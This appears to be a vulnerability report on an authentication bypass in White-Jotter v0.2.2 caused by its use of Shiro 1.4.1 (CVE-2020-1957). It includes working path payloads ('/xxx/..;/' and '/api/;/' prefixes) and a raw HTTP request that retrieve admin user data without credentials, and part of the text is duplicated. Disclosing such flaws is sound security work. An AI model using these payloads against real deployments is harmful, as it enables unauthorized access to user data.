White-Jotter v0.2.2 has an authorization bypass vulnerability, allowing unauthorized users to access sensitive system information and even modify critical system data. This vulnerability compromises the confidentiality, integrity of the system.
Code Auditing
Shiro 1.4.1 is used for access control by the project.
According to CVE-2020-1957, Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass. Therefore, the projects is vulnerable to authentication bypass.
Proof of Concept
Visit the url http://x.x.x.x:8443/api/admin/user to get user information. Without cookie, it responses no data. The request and response are as following.
Add “/xxx/..;/” in the head of the request path, aka the new url is http://x.x.x.x:8443/xxx/..;/api/admin/user. Although without cookie, it responses with user information. It bypasses the authentication.
![image](https://github.com/user-attachments/assets/7bd77111-4e9c-4202-9253-672b8ca5a6c4)
3. We can also use this payload to bypass the authentication.
White-Jotter v0.2.2 has an authorization bypass vulnerability, allowing unauthorized users to access sensitive system information and even modify critical system data. This vulnerability compromises the confidentiality, integrity of the system.
Code Auditing
Shiro 1.4.1 is used for access control by the project. According to CVE-2020-1957, Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass. Therefore, the projects is vulnerable to authentication bypass.
Proof of Concept
GET /api/;/admin/user HTTP/1.1 Host: x.x.x.x:8443 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Origin: http://x.x.x.x:8080 Connection: keep-alive Referer: http://x.x.x.x:8080/